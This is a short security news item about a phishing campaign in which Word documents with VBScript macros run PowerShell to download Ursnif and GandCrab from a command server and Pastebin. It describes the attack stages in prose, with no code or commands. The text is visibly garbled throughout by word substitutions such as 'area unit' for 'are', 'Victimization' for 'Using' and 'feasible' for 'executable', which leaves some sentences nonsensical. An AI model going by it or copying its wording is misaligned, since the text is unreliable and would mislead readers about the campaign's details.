Beware of Malicious Word Documents that Downloads the Ursnif Malware and GandCrab Ransomware
A new phishing email campaign contained a malicious word document with macros downloads and executes Ursnif malware and GandCrab ransomware.
SCS ascertained the campaign in wild and roughly 180 variants detected.
The first stage of attack starts in delivering of weaponized MS word document to deliver the initial stages, in keeping with data it seems the documents ready on december 17, 2018, and continues up to january 21, 2019. Documents found embedded with VBS macros that contain 18 lines of VBScript.
The Second stage starts with the execution of PowerShell script that makes an online consumer instances and looks for DownloadString to speak with C2 server and stores the info within the CommonApplicationData directory.
The attack if self-made delivers multiple payloads within the infected machine, “the overall attack leverages many completely different approaches, that area unit widespread techniques amongst red teamers, undercover work targeted adversaries, and enormous scale criminal campaigns.”
The first payload downloaded via the DownloadString method analyzes the system architecture of the compromised system and downloads additional payload from pastebin which is the GandCrab Variant.
The Gandcrab Ransomware is a widespread Ransomware, nowadays it evolves with newly updated futures under constant development to target various countries.
The second payload is that the Ursnif feasible that harvest the system info, once executed it performs credential harvesting, gathering system and method info, and deploying further malware samples.
Researcher’s ascertained quite 120 totally different Ursnif variants were hosted and also the file name continuously changes within the campaign.
“While researching this campaign about 180 variants were settled within the wild. Victimization the Virus Total Graph practicality these variants may be organized into many teams that were usually associated by either data or document structures.”
Ursnif campaign conjointly noticed by the SCS, the malicious macro contains one command encoded with base64 and it downloads the Ursnif feasible.